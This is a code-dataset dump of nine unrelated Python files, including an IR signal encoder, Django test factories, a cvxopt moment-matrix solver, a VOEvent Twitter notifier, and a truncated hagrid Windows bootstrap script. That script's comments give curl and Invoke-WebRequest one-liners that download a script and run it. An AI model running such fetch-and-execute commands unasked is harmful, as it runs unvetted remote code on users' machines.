id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
8158169 | <gh_stars>0
"""Classes and functions to perform encoding."""
from __future__ import annotations
# pylint: disable=cyclic-import
from remoteprotocols import codecs
def encode_rule(
    rule: codecs.RuleDef, args: list[int], timings: codecs.TimingsDef
) -> list[int]:
    """Translate a single protocol rule into a list of signal pulses."""
    # Named-timings rule: a positive type indexes directly into the timing slots.
    if rule.type > 0:
        return timings.get_slot(rule.type - 1, args)

    # Data rule: emit the timed pulses for each bit of the evaluated value.
    if rule.type == 0:
        value = rule.eval_op(rule.data.get(args))
        bit_count = rule.nbits.get(args)
        # Action "M" sends the most-significant bit first; otherwise LSB first.
        if rule.action == "M":
            order = range(bit_count - 1, -1, -1)
        else:
            order = range(bit_count)
        pulses: list[int] = []
        for position in order:
            pulses.extend(timings.get_bit(value & (1 << position), args))
        return pulses

    # Conditional rule: encode the consequent, or the alternate when present.
    if rule.type == -1:
        if rule.eval_cond(args):
            return encode_rules(rule.consequent, args, timings)  # type: ignore
        if rule.alternate:
            return encode_rules(rule.alternate, args, timings)

    return []
def encode_rules(
    rules: list[codecs.RuleDef], args: list[int], timings: codecs.TimingsDef
) -> list[int]:
    """Concatenate the pulses produced by every rule in *rules*, in order."""
    pulses: list[int] = []
    for current in rules:
        pulses.extend(encode_rule(current, args, timings))
    return pulses
def encode_pattern(
    pattern: codecs.PatternDef, args: list[int], timings: codecs.TimingsDef
) -> list[int]:
    """Convert a pattern into the corresponding signal.

    The frame layout is: optional ``pre`` once, then ``data`` repeated
    ``repeat_send``/``repeat`` times (with optional ``mid`` after each
    repetition), then optional ``post`` once.
    """
    # repeat_send takes precedence over repeat when both are defined.
    send_count = 1
    if hasattr(pattern, "repeat_send"):
        send_count = pattern.repeat_send.get(args)
    elif hasattr(pattern, "repeat"):
        send_count = pattern.repeat.get(args)

    signal: list[int] = []
    if hasattr(pattern, "pre"):
        signal += encode_rules(pattern.pre, args, timings)
    for _ in range(send_count):
        signal += encode_rules(pattern.data, args, timings)
        if hasattr(pattern, "mid"):
            signal += encode_rules(pattern.mid, args, timings)
    if hasattr(pattern, "post"):
        signal += encode_rules(pattern.post, args, timings)
    return signal
| StarcoderdataPython |
5058083 | <reponame>stevepiercy/pycon
import random
import factory
import factory.django
import factory.fuzzy
from django.contrib.auth import models as auth
from pycon.models import PyConProposalCategory, PyConProposal, \
PyConTalkProposal, PyConTutorialProposal
from symposion.proposals.tests.factories import ProposalKindFactory, \
ProposalBaseFactory
class UserFactory(factory.django.DjangoModelFactory):
    """Factory for Django auth users with randomised names and unique emails."""
    FACTORY_FOR = auth.User

    username = factory.fuzzy.FuzzyText()
    first_name = factory.fuzzy.FuzzyText()
    last_name = factory.fuzzy.FuzzyText()
    # The original expression was mangled by source anonymisation and was not
    # valid Python; rebuild a unique, valid address from the sequence counter.
    email = factory.Sequence(lambda n: 'user{0}@example.com'.format(n))
class PyConProposalCategoryFactory(factory.django.DjangoModelFactory):
    # Bare factory: a category row needs no extra attributes here.
    FACTORY_FOR = PyConProposalCategory
class PyConProposalFactory(ProposalBaseFactory):
    """Abstract base factory shared by the talk and tutorial factories."""
    FACTORY_FOR = PyConProposal
    # Marked abstract: only the concrete subclasses are instantiated.
    ABSTRACT_FACTORY = True

    category = factory.SubFactory(PyConProposalCategoryFactory)
    # Random audience level in {1, 2, 3} — presumably novice/intermediate/
    # experienced; NOTE(review): confirm the mapping against the model.
    audience_level = factory.LazyAttribute(lambda a: random.choice([1, 2, 3]))
class PyConTalkProposalFactory(PyConProposalFactory):
    """Factory producing talk proposals with placeholder text fields."""
    FACTORY_FOR = PyConTalkProposal

    duration = 0
    kind = factory.SubFactory(ProposalKindFactory,
                              name="talk",
                              slug="talk")
    outline = "outline"
    audience = "audience"
    perceived_value = "perceived_value"
class PyConTutorialProposalFactory(PyConProposalFactory):
    """Factory producing tutorial proposals with placeholder text fields."""
    FACTORY_FOR = PyConTutorialProposal

    kind = factory.SubFactory(ProposalKindFactory,
                              name="tutorial",
                              slug="tutorial")
    domain_level = 1
    outline = "outline"
    more_info = "more info"
    audience = "audience"
    perceived_value = "perceived_value"
| StarcoderdataPython |
12844159 | # pylint: disable=unused-import
import pytest
import tests.helpers.constants as constants
from tests.helpers.utils import *
from geckordp.rdp_client import RDPClient
from geckordp.actors.root import RootActor
from geckordp.actors.descriptors.tab import TabActor
from geckordp.actors.accessibility.accessibility import AccessibilityActor
from geckordp.logger import log, logdict
def init():
    """Connect to the remote debugging server and return (client, AccessibilityActor).

    The caller owns the returned client and must disconnect it.
    """
    cl = RDPClient(3)
    cl.connect(constants.REMOTE_HOST, constants.REMOTE_PORT)
    root = RootActor(cl)
    current_tab = root.current_tab()
    tab = TabActor(cl, current_tab["actor"])
    actor_ids = tab.get_target()
    accessibility = AccessibilityActor(cl, actor_ids["accessibilityActor"])
    # bootstrap() must run once before other accessibility requests.
    accessibility.bootstrap()
    return cl, accessibility
def test_get_traits():
    """get_traits() must report the accessibility traits."""
    cl = None
    try:
        cl, accessibility = init()
        val = accessibility.get_traits()
        assert val.get("tabbingOrder", None) is not None
    finally:
        # Bug fix: if init() raises before 'cl' is assigned, calling
        # None.disconnect() raised AttributeError and masked the real error.
        if cl is not None:
            cl.disconnect()
def test_bootstrap():
    """bootstrap() must return a non-empty response."""
    cl = None
    try:
        cl, accessibility = init()
        val = accessibility.bootstrap()
        assert len(val.keys()) > 0
    finally:
        # Bug fix: guard against 'cl' still being None when init() failed.
        if cl is not None:
            cl.disconnect()
def test_get_walker():
    """get_walker() must return an actor id."""
    cl = None
    try:
        cl, accessibility = init()
        val = accessibility.get_walker()
        assert val.get("actor", None) is not None
    finally:
        # Bug fix: guard against 'cl' still being None when init() failed.
        if cl is not None:
            cl.disconnect()
def test_get_simulator():
    """get_simulator() may legitimately return no actor in headless mode."""
    cl = None
    try:
        cl, accessibility = init()
        val = accessibility.get_simulator()
        simulator_id = val.get("actor", None)
        if (simulator_id is None):
            log("No simulator actor found, firefox is probably running in headless mode")
    finally:
        # Bug fix: guard against 'cl' still being None when init() failed.
        if cl is not None:
            cl.disconnect()
| StarcoderdataPython |
3297669 | # -*- coding: utf-8 -*-
from acrylamid.utils import Metadata, neighborhood
import attest
# Collection that registers the function-style tests defined below.
tt = attest.Tests()
class TestMetadata(attest.TestBase):
    """Behavioural tests for acrylamid's dotted-key Metadata mapping."""

    @attest.test
    def works(self):
        # Dotted assignment creates nested dicts, readable both by
        # subscription and by attribute access.
        dct = Metadata()
        dct['hello.world'] = 1
        assert dct['hello']['world'] == 1
        assert dct.hello.world == 1
        # Missing attributes must raise KeyError (not AttributeError).
        try:
            dct.foo
            dct.foo.bar
        except KeyError:
            assert True
        else:
            assert False
        # A second dotted key under the same prefix must not clobber
        # existing entries.
        dct['hello.foreigner'] = 2
        assert dct['hello']['world'] == 1
        assert dct.hello.world == 1
        assert dct.hello.foreigner == 2

    @attest.test
    def redirects(self):
        # redirect() renames a key while keeping its value.
        dct = Metadata()
        alist = [1, 2, 3]
        dct['foo'] = alist
        dct.redirect('foo', 'baz')
        assert 'foo' not in dct
        assert 'baz' in dct
        assert dct['baz'] == alist

    @attest.test
    def update(self):
        # update() must expand dotted keys just like item assignment.
        dct = Metadata()
        dct.update({'hello.world': 1})
        assert 'hello' in dct
        assert dct.hello.world == 1

    @attest.test
    def init(self):
        # The constructor accepts dotted keys directly.
        assert Metadata({'hello.world': 1}).hello.world == 1
@tt.test
def neighbors():
    # neighborhood() yields (previous, current, next) triples, padding
    # the two ends with None.
    assert list(neighborhood([1, 2, 3])) == \
        [(None, 1, 2), (1, 2, 3), (2, 3, None)]
| StarcoderdataPython |
3423036 | <gh_stars>0
# emailstore.py
# Copyright 2014 <NAME>
# Licence: See LICENCE (BSD licence)
"""Email selection collection application."""
if __name__ == "__main__":
    from . import APPLICATION_NAME

    # Import the start/stop helpers first: if even this fails we can only
    # report the problem with bare tkinter before bailing out.
    try:
        from solentware_misc.gui.startstop import (
            start_application_exception,
            stop_application,
            application_exception,
        )
    except Exception as error:
        import tkinter.messagebox

        try:
            tkinter.messagebox.showerror(
                title="Start Exception",
                message=".\n\nThe reported exception is:\n\n".join(
                    (
                        "Unable to import solentware_misc.gui.startstop module",
                        str(error),
                    )
                ),
            )
        except BaseException:
            # Even the error dialog failed (e.g. no display); exit silently.
            pass
        raise SystemExit(
            "Unable to import start application utilities"
        ) from None
    # Import the application's main widget.
    try:
        from .gui.select import Select
    except Exception as error:
        start_application_exception(
            error, appname=APPLICATION_NAME, action="import"
        )
        raise SystemExit(
            " import ".join(("Unable to", APPLICATION_NAME))
        ) from None
    # Build the top-level window.
    try:
        app = Select(title=APPLICATION_NAME, width=400, height=200)
    except Exception as error:
        start_application_exception(
            error, appname=APPLICATION_NAME, action="initialise"
        )
        raise SystemExit(
            " initialise ".join(("Unable to", APPLICATION_NAME))
        ) from None
    # Run the Tk event loop, routing any crash through the GUI helpers.
    try:
        app.root.mainloop()
    except SystemExit:
        stop_application(app, app.root)
        raise
    except Exception as error:
        application_exception(
            error,
            app,
            app.root,
            title=APPLICATION_NAME,
            appname=APPLICATION_NAME,
        )
| StarcoderdataPython |
8073783 | <reponame>toptive/generator-toptive-python
# -*- coding: utf-8 -*-
"""Top-level package for <%= projectName %>."""

# Package metadata; the <%= ... %> placeholders are rendered by the
# Yeoman generator when the project is scaffolded.
__author__ = '<%= projectAuthor %>'
__email__ = '<%= authorEmail %>'
__version__ = '<%= projectVersion %>'
| StarcoderdataPython |
4921554 | #!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
"""
Solve a given moment matrix using various ways.
"""
from cvxopt import matrix, sparse, spmatrix, spdiag
import cvxopt.solvers as cvxsolvers
# Tighten CVXOPT's interior-point tolerances and silence its per-iteration log.
cvxsolvers.options['maxiters'] = 150
cvxsolvers.options['feastol'] = 1e-6
cvxsolvers.options['abstol'] = 1e-7
cvxsolvers.options['reltol'] = 1e-6
cvxsolvers.options['show_progress'] = False
import sympy as sp
import numpy as np
import scipy as sc
import ipdb
import itertools
from core import MomentMatrix
from core import LocalizingMatrix
# Toggle for the verbose debugging output in monomial_filter.
_debug_mmsolvers = False
def monomial_filter(mono, filter='even'):
    """Return 1 when *mono* is the constant 1 or has only even degrees, else 0.

    NOTE(review): only the 'even' filter is implemented; any other value
    falls through and returns None. 'filter' also shadows the builtin.
    """
    # NOTE(review): identity comparison against a str literal works on
    # CPython via interning, but '==' is what is intended here.
    if filter is 'even':
        if _debug_mmsolvers and not mono==1:
            print str(mono) + ':\t' + str(all([(i%2)==0 for i in mono.as_poly().degree_list()]))
        return 1 if mono==1 else int(all([i%2==0 for i in mono.as_poly().degree_list()]))
def get_cvxopt_Gh(LM, sparsemat = True):
    """
    get the G and h corresponding to this localizing matrix

    G is the (optionally sparse) LMI coefficient matrix, h a zero matrix
    sized by the localizing matrix's row monomials.
    """
    if sparsemat:
        G = sparse(LM.get_LMI_coefficients(), tc='d').trans()
    else:
        G = matrix(LM.get_LMI_coefficients(), tc='d').trans()
    num_rms = len(LM.row_monos)
    h = matrix(np.zeros((num_rms, num_rms)))
    return {'G':G, 'h':h}
def get_cvxopt_inputs(MM, constraints = None, slack = 0, sparsemat = True, filter = 'even'):
    """
    if provided, constraints should be a list of sympy polynomials that should be 0.
    @params - constraints: a list of sympy expressions representing the constraints in the same

    Returns the dict of CVXOPT SDP inputs: objective c, LMI cone (G, h),
    equality system (A, b) and slackened inequalities (Gl, hl).
    """
    # Many optionals for what c might be, not yet determined really
    if filter is None:
        c = matrix(np.ones((MM.num_matrix_monos, 1)))
    else:
        # NOTE(review): the 'filter' argument is ignored here; 'even' is
        # always passed through to monomial_filter.
        c = matrix([monomial_filter(yi, filter='even') for yi in MM.matrix_monos], tc='d')
    Anp,bnp = MM.get_Ab(constraints)
    #_, residual, _, _ = scipy.linalg.lstsq(Anp, bnp)
    b = matrix(bnp)
    indicatorlist = MM.get_LMI_coefficients()
    Glnp,hlnp = MM.get_Ab_slack(constraints, abs_slack = slack, rel_slack = slack)
    hl = matrix(hlnp)
    if sparsemat:
        G = [sparse(indicatorlist).trans()]
        A = sparse(matrix(Anp))
        Gl = sparse(matrix(Glnp))
    else:
        G = [matrix(indicatorlist).trans()]
        A = matrix(Anp)
        Gl = matrix(Glnp)
    num_row_monos = len(MM.row_monos)
    h = [matrix(np.zeros((num_row_monos,num_row_monos)))]
    return {'c':c, 'G':G, 'h':h, 'A':A, 'b':b, 'Gl':Gl, 'hl':hl}
def get_constraint_row_monos(MM, constr):
    """Return the coefficient row of *constr* with respect to MM.row_monos.

    Bug fix: the original iterated ``enumerate(len(MM.row_monos))``, which
    raises TypeError because an int is not iterable; enumerate the monomial
    list itself.
    """
    Ai = np.zeros(len(MM.row_monos))
    coefdict = constr.as_coefficients_dict()
    for i, yi in enumerate(MM.row_monos):
        # Monomials absent from the constraint contribute a zero coefficient.
        Ai[i] = coefdict.get(yi, 0)
    return Ai
def solve_ith_GMP(MM, objective, gs, hs, slack = 0):
    """
    Generalized moment problem solver
    @param - objective: a sympy expression that is the objective
    @param - gs: list of contraints defining the semialgebraic set K,
    each g corresponds to localizing matrices.
    @param - hs: constraints on the moments,
    not needed for polynomial optimization.
    @param - slack: add equalities as pairs of inequalities with slack separation.
    """
    cin = get_cvxopt_inputs(MM, hs, slack=slack)
    Bf = MM.get_Bflat()
    objcoeff,__ = MM.get_Ab([objective], cvxoptmode = False)
    # One localizing matrix (and hence one extra LMI cone) per inequality g.
    locmatrices = [LocalizingMatrix(MM, g) for g in gs]
    Ghs = [get_cvxopt_Gh(lm) for lm in locmatrices]
    # list addition
    Gs=cin['G'] + [Gh['G'] for Gh in Ghs]
    # NOTE(review): this rebinds the 'hs' parameter to the cone h blocks,
    # shadowing the moment constraints argument from here on.
    hs=cin['h'] + [Gh['h'] for Gh in Ghs]
    # print Ghs
    solsdp = cvxsolvers.sdp(matrix(objcoeff[0,:]), Gs=Gs, hs=hs, A=cin['A'], b=cin['b'])
    #ipdb.set_trace()
    return solsdp
def solve_GMP(objective, gs = None, hs = None, rounds = 1, slack = 1e-6):
    """
    Outer loop of the generalized moment problem solver
    @param - objective: a sympy expression that is the objective
    @param - gs: list of constraints defining the semialgebraic set K,
    each g corresponds to localizing matrices. These should be non-strict sympy inequalities.
    @param - hs: constraints on the moments. Currently only supporting equalities.
    @param - rounds: rounds of relaxation to carry out, default=0.
    """
    if gs is None: gs = []
    if hs is None: hs = []
    # problem setup here
    constrs = []
    syms = objective.free_symbols
    mindeg = objective.as_poly().total_degree()
    for h in hs:
        if type(h) == sp.relational.GreaterThan or type(h) == sp.relational.LessThan:
            # NOTE(review): NotImplemented is a value, not an exception;
            # NotImplementedError was almost certainly intended here.
            raise NotImplemented('currently only supporting equalities')
    # Normalize every inequality to the form nf >= 0.
    for g in gs:
        if type(g) == sp.relational.GreaterThan:
            nf = g.lhs - g.rhs
        elif type(g) == sp.relational.LessThan:
            nf = (g.rhs - g.lhs).expand()
        else:
            raise ValueError('only supporting inequality constraints with >= and <=, ' +
                             'convert your equality constraints!')
        constrs += [nf]
        degnf = nf.as_poly().total_degree()
        if degnf > mindeg: mindeg = degnf
        syms.update(nf.free_symbols)
    print 'the maximum degree appearing in the problem is %d' % mindeg
    #for g in constrs:
    #    print g
    # Smallest relaxation order that covers the highest-degree constraint.
    mdeg = int( (mindeg+1)/2 )
    objvals = {}
    for i in range(mdeg,mdeg + rounds):
        MM = MomentMatrix(i, list(syms), morder='grevlex')
        soldict = solve_ith_GMP(MM, objective, constrs, hs, slack = slack)
        soldict['MM'] = MM
        print 'status: ' + soldict['status']
        r = np.linalg.matrix_rank(MM.numeric_instance(soldict['x']), 1e-2)
        print 'round=%d,\t rank=%d,\t size=%d,\t obj=%.3f'\
            % (i-mdeg+1, r, len(MM), soldict['primal objective'])
        objvals[i] = soldict['primal objective']
    # Only the last round's solution is returned; objvals is kept per round
    # but not exposed.
    return soldict
def solve_basic_constraints(MM, constraints, slack = 1e-2):
    """
    Solve using the moment matrix.
    Use @symbols with basis bounded by degree @deg.
    Also use the constraints.
    """
    cin = get_cvxopt_inputs(MM, constraints, slack=slack)
    Bf = MM.get_Bflat()
    # NOTE(review): the random weight W and flattened w below are computed
    # but never passed to the solver; cin['c'] is used as the objective.
    R = np.random.rand(len(MM), len(MM))
    W = R.dot(R.T)
    #W = np.eye(len(MM))
    w = Bf.dot(W.flatten())
    solsdp = cvxsolvers.sdp(c=cin['c'], Gs=cin['G'], hs=cin['h'], Gl=cin['Gl'], hl=cin['hl'])
    #ipdb.set_trace()
    return solsdp
def solve_generalized_mom_coneqp(MM, constraints, pconstraints=None, maxiter = 1):
    """
    solve using iterative GMM using the quadratic cone program
    func_W takes a solved instance and returns the weighting matrix,
    this function has access to individual data points
    @params
    constraints - E[g(x,X)] = f(x) - h(X) that are supposed to be 0
    Eggt - the function handle takes current f(x) and estimates
    E[g(x,X)g(x,X)'] \in \Re^{n \times n}, the information matrix
    maxiter - times to run the iterative GMM

    NOTE(review): 'pconstraints' is accepted but never used.
    """
    N = len(constraints)
    D = len(MM.matrix_monos)
    sr = len(MM.row_monos)
    A,b = MM.get_Ab(constraints, cvxoptmode = False)
    #ipdb.set_trace()
    # augumented constraint matrix introduces slack variables g
    A_aug = sparse(matrix(sc.hstack((A, 1*sc.eye(N+1)[:,:-1]))))
    # Quadratic cost only on the slack block; the moment block has zero cost.
    P = spdiag([matrix(0*np.eye(D)), matrix(np.eye(N))])
    b = matrix(b)
    indicatorlist = MM.get_LMI_coefficients()
    G = sparse(indicatorlist).trans()
    V,I,J = G.V, G.I, G.J,
    # Re-embed the LMI coefficients in the augmented (moments + slack) space.
    Gaug = sparse(spmatrix(V,I,J,size=(sr*sr, N + D)))
    h = matrix(np.zeros((sr*sr,1)))
    dims = {}
    dims['l'] = 0
    dims['q'] = []
    dims['s'] = [sr]
    Bf = MM.get_Bflat()
    R = np.random.rand(len(MM), len(MM))
    # NOTE(review): the random weight is immediately overwritten by identity.
    W = R.dot(R.T)
    W = np.eye(len(MM))
    w = Bf.dot(W.flatten())[:,np.newaxis]
    q = 1e-5*matrix(np.vstack( (w,np.zeros((N,1))) ))
    #ipdb.set_trace()
    for i in xrange(maxiter):
        w = Bf.dot(W.flatten())[:,np.newaxis]
        sol = cvxsolvers.coneqp(P, q, G=Gaug, h=h, dims=dims, A=A_aug, b=b)
    # Drop the slack variables, keeping only the moment vector.
    sol['x'] = sol['x'][0:D]
    return sol
def solve_generalized_mom_conelp(MM, constraints, W=None, absslack=1e-4, totalslack=1e-2, maxiter = 1):
    """
    solve using iterative GMM using the cone linear program
    W is a specific weight matrix
    we give generous bound for each constraint, and then harsh bound for
    g'Wg
    @params
    constraints - E[g(x,X)] = f(x) - phi(X) that are supposed to be 0
    Eggt - the function handle takes current f(x) and estimates
    E[g(x,X)g(x,X)'] \in \Re^{n \times n}, the information matrix
    maxiter - times to run the iterative GMM

    NOTE(review): the 'W', 'absslack' and 'totalslack' parameters are not
    used; W is overwritten with the identity below and coneqp (not conelp)
    is actually called.
    """
    N = len(constraints)
    D = len(MM.matrix_monos)
    sr = len(MM.row_monos)
    A,b = MM.get_Ab(constraints, cvxoptmode = False)
    # augumented constraint matrix introduces slack variables g
    A_aug = sparse(matrix(sc.hstack((A, 1*sc.eye(N+1)[:,:-1]))))
    P = spdiag([matrix(0*np.eye(D)), matrix(np.eye(N))])
    b = matrix(b)
    indicatorlist = MM.get_LMI_coefficients()
    G = sparse(indicatorlist).trans()
    V,I,J = G.V, G.I, G.J,
    Gaug = sparse(spmatrix(V,I,J,size=(sr*sr, N + D)))
    h = matrix(np.zeros((sr*sr,1)))
    dims = {}
    dims['l'] = 0
    dims['q'] = []
    dims['s'] = [sr]
    Bf = MM.get_Bflat()
    R = np.random.rand(len(MM), len(MM))
    #W = R.dot(R.T)
    W = np.eye(len(MM))
    w = Bf.dot(W.flatten())[:,np.newaxis]
    q = matrix(np.vstack( (w,np.zeros((N,1))) ))
    #ipdb.set_trace()
    for i in xrange(maxiter):
        w = Bf.dot(W.flatten())[:,np.newaxis]
        sol = cvxsolvers.coneqp(P, q, G=Gaug, h=h, dims=dims, A=A_aug, b=b)
    # Drop the slack variables, keeping only the moment vector.
    sol['x'] = sol['x'][0:D]
    return sol
# solve for the weight matrix in convex iteration
def solve_W(Xstar, rank):
    """
    minimize trace(Xstar*W)
    s.t. 0 \preceq W \preceq I
    trace(W) = n - rank
    """
    # Basis of symmetric matrices: one per diagonal entry, then one per
    # lower-triangular (i, j) pair mirrored to keep symmetry.
    Balpha = []
    numrow = Xstar.shape[0]
    lowerdiaginds = [(i,j) for (i,j) in \
                     itertools.product(xrange(numrow), xrange(numrow)) if i>j]
    diaginds = [i+i*numrow for i in xrange(numrow)]
    for i in diaginds:
        indices = [i]
        values = [-1]
        Balpha += [spmatrix(values, [0]*len(indices), \
                            indices, size=(1,numrow*numrow), tc='d')]
    for i,j in lowerdiaginds:
        indices = [i+j*numrow, j+i*numrow]
        values = [-1, -1]
        Balpha += [spmatrix(values, [0]*len(indices), \
                            indices, size=(1,numrow*numrow), tc='d')]
    # Two LMI blocks encode 0 <= W <= I.
    Gs = [sparse(Balpha, tc='d').trans()] + [-sparse(Balpha, tc='d').trans()]
    hs = [matrix(np.zeros((numrow, numrow)))] + [matrix(np.eye(numrow))]
    # Trace constraint: sum of the diagonal coordinates equals n - rank.
    A = sparse(spmatrix([1]*numrow, [0]*numrow, \
               range(numrow), size=(1,numrow*(numrow+1)/2), tc='d'))
    b = matrix([numrow - rank], size=(1,1), tc='d')
    x = [np.sum(Xstar.flatten()*matrix(Balphai)) for Balphai in Balpha]
    sol = cvxsolvers.sdp(-matrix(x), Gs=Gs, hs=hs, A=A, b=b)
    w = sol['x']
    # Reassemble the dense W from the basis coordinates.
    Wstar = 0
    for i,val in enumerate(w):
        Wstar += -val*np.array(Balpha[i])
    #ipdb.set_trace()
    return Wstar,sol
def solve_moments_with_convexiterations(MM, constraints, maxrank = 3, slack = 1e-3, maxiter = 200):
    """
    Solve using the moment matrix iteratively using the rank constrained convex iterations
    Use @symbols with basis bounded by degree @deg.
    Also use the constraints.

    NOTE(review): the 'slack' parameter is accepted but not forwarded to
    get_cvxopt_inputs.
    """
    cin = get_cvxopt_inputs(MM, constraints)
    Bf = MM.get_Bflat()
    R = np.random.rand(len(MM), len(MM))
    #W = R.dot(R.T)
    W = np.eye(len(MM))
    tau = []
    # Alternate between the moment SDP (fixed W) and the weight SDP (fixed X)
    # until the rank-excess surrogate tau is small enough.
    for i in xrange(maxiter):
        w = Bf.dot(W.flatten())
        #solsdp = cvxsolvers.sdp(matrix(w), Gs=cin['G'], hs=cin['h'], A=cin['A'], b=cin['b'])
        solsdp = cvxsolvers.sdp(matrix(w), Gs=cin['G'], hs=cin['h'], Gl=cin['Gl'], hl=cin['hl'])
        Xstar = MM.numeric_instance(solsdp['x'])
        W,solW = solve_W(Xstar, maxrank)
        W = np.array(W)
        ctau = np.sum(W * Xstar.flatten())
        if ctau < 1e-3:
            break
        tau.append(ctau)
        #ipdb.set_trace()
    print tau
    return solsdp
def test_mmsolvers():
    """Smoke test: recover the 4th moment of a unimixture from the others."""
    # simple test to make sure things run
    print 'testing simple unimixture with a skipped observation, just to test that things run'
    x = sp.symbols('x')
    M = MomentMatrix(3, [x], morder='grevlex')
    # Moments of the uniform mixture on {1, 2}; x**3 is deliberately omitted.
    constrs = [x-1.5, x**2-2.5, x**4-8.5]
    #constrs = [x-1.5, x**2-2.5, x**3-4.5, x**4-8.5]
    cin = get_cvxopt_inputs(M, constrs, slack = 1e-5)
    #import MomentMatrixSolver
    #print 'joint_alternating_solver...'
    #y,L = MomentMatrixSolver.sgd_solver(M, constrs, 2, maxiter=101, eta = 0.001)
    #y,X = MomentMatrixSolver.convex_projection_solver(M, constrs, 2, maxiter=2000)
    #print y
    #print X
    # Localizing constraints bounding the support to [-2, 2].
    gs = [2-x, 2+x]
    locmatrices = [LocalizingMatrix(M, g) for g in gs]
    Ghs = [get_cvxopt_Gh(lm) for lm in locmatrices]
    Gs=cin['G'] + [Gh['G'] for Gh in Ghs]
    hs=cin['h'] + [Gh['h'] for Gh in Ghs]
    sol = cvxsolvers.sdp(cin['c'], Gs=Gs, \
                         hs=hs, A=cin['A'], b=cin['b'])
    print sol['x']
    print abs(sol['x'][3]-4.5)
    # The skipped third moment should be recovered as 4.5.
    assert(abs(sol['x'][3]-4.5) <= 1e-3)
    import extractors
    print extractors.extract_solutions_lasserre(M, sol['x'], Kmax = 2)
    print 'true values are 1 and 2'
| StarcoderdataPython |
8037381 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import io
import os
import unittest
from unittest.mock import call, patch
from parameterized import parameterized
from airflow.exceptions import AirflowException
from airflow.models import Connection
from airflow.providers.teradata.hooks.ttu import TtuHook
from airflow.utils import db
class TestTtuHook(unittest.TestCase):
    """Tests for the Teradata TTU hook's BTEQ script builder."""

    _simple_bteq = """SELECT CURRENT_DATE;
    .IF ERRORCODE <> 0 THEN .QUIT 0300;.QUIT 0;"""

    def setUp(self):
        """Register the test connection used by TtuHook."""
        db.merge_conn(
            Connection(
                conn_id='ttu_default',
                conn_type='ttu',
                host='localhost',
                # Bug fix: the original was missing the comma after login,
                # which is a SyntaxError.
                login='login',
                password='password',
            )
        )

    def test_build_bteq_file(self):
        """_prepare_bteq_script must wrap the SQL in LOGON/SET directives."""
        # Given
        hook = TtuHook(ttu_conn_id='ttu_default')
        conn = hook.get_conn()
        # When
        bteq = hook._prepare_bteq_script(self._simple_bteq,
                                         conn['host'],
                                         conn['login'],
                                         conn['password'],
                                         conn['bteq_output_width'],
                                         conn['bteq_session_encoding'],
                                         conn['bteq_quit_zero']
                                         )
        # Then
        expected_bteq = """
.LOGON localhost/login,
.SET WIDTH 65531;
.SET SESSION CHARSET 'ASCII';
SELECT CURRENT_DATE;
.IF ERRORCODE <> 0 THEN .QUIT 0300;
.QUIT 0;
"""
        # Bug fix: the original asserted expected_bteq against itself, so
        # the test could never fail. Compare against the generated script.
        # NOTE(review): the expected text may need the anonymised password
        # restored on the .LOGON line to match the real hook output.
        self.assertEqual(expected_bteq, bteq)
| StarcoderdataPython |
8189611 | <filename>gcnlive/main.py
import os
import sys
import voeventparse
import twitter
import voeventparse
def tweet(text, key_path):
    """Post *text* to Twitter using the key file at *key_path*.

    The key file must hold, one per line: consumer key, consumer secret,
    access token key, access token secret.
    """
    with open(key_path, 'r') as f:
        keys = f.read().splitlines()
    api = twitter.Api(consumer_key=keys[0],
                      consumer_secret=keys[1],
                      access_token_key=keys[2],
                      access_token_secret=keys[3])
    api.PostUpdate(text)
def main():
    """Read a VOEvent XML document from stdin, dispatch it, print the result."""
    key_path = os.path.join(
        os.path.dirname(os.path.realpath(__file__)), '.keysecret')
    stdin = sys.stdin.read()
    v = voeventparse.loads(stdin)
    response = process_voevent(v)
    if response is not None:
        print(response)
        # Tweeting is disabled; re-enable once the key file is in place.
        # tweet(response, key_path)
def handle_grb(v):
    """Format the notification text for a Swift BAT GRB position VOEvent."""
    position = voeventparse.pull_astro_coords(v)
    return "Swift GRB Alert received, coords are {}".format(position)
def handle_pointing(v):
    """Format the notification text for a Swift repointing VOEvent."""
    position = voeventparse.pull_astro_coords(v)
    return "Swift repointing, coords are {}".format(position)
# Maps an IVORN prefix to the handler that formats its notification.
prefix_handler_map = {
    'ivo://nasa.gsfc.gcn/SWIFT#BAT_GRB_Pos': handle_grb,
    "ivo://nasa.gsfc.gcn/SWIFT#Point_Dir_": handle_pointing,
}
def process_voevent(v):
    """Return the matching handler's message for *v*, or None when no
    registered IVORN prefix matches."""
    ivorn = v.attrib['ivorn']
    matches = (
        handler
        for prefix, handler in prefix_handler_map.items()
        if ivorn.startswith(prefix)
    )
    chosen = next(matches, None)
    return chosen(v) if chosen is not None else None
9716797 | <reponame>vishalbelsare/PySyft<filename>packages/hagrid/hagrid/win_bootstrap.py
# coding=utf-8
# stdlib
import subprocess
from typing import Callable
from typing import List
# one liner to use bootstrap script:
# CMD: curl https://raw.githubusercontent.com/OpenMined/PySyft/dev/packages/hagrid/hagrid/win_bootstrap.py > win_bootstrap.py && python win_bootstrap.py # noqa
# Powershell is complaining about a utf-8 issue we need to fix, could be related to a
# bug with long lines in utf-8
# PS: $r = Invoke-WebRequest "https://raw.githubusercontent.com/OpenMined/PySyft/dev/packages/hagrid/hagrid/win_bootstrap.py" -UseBasicParsing; echo $r.Content > win_bootstrap.py; python win_bootstrap.py # noqa
class Requirement:
    """A single dependency: display name, chocolatey package id, and a
    detection callback reporting whether it is already installed."""

    def __init__(
        self, full_name: str, choco_name: str, detect: Callable, extras: str = ""
    ) -> None:
        # Public attributes: the rest of the script reads these directly.
        self.full_name = full_name
        self.choco_name = choco_name
        self.detect = detect
        self.extras = extras

    def __repr__(self) -> str:
        # Show the human-friendly name when requirements are printed.
        return self.full_name
# PowerShell snippet that installs the Chocolatey package manager.
install_choco_pwsh = """
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
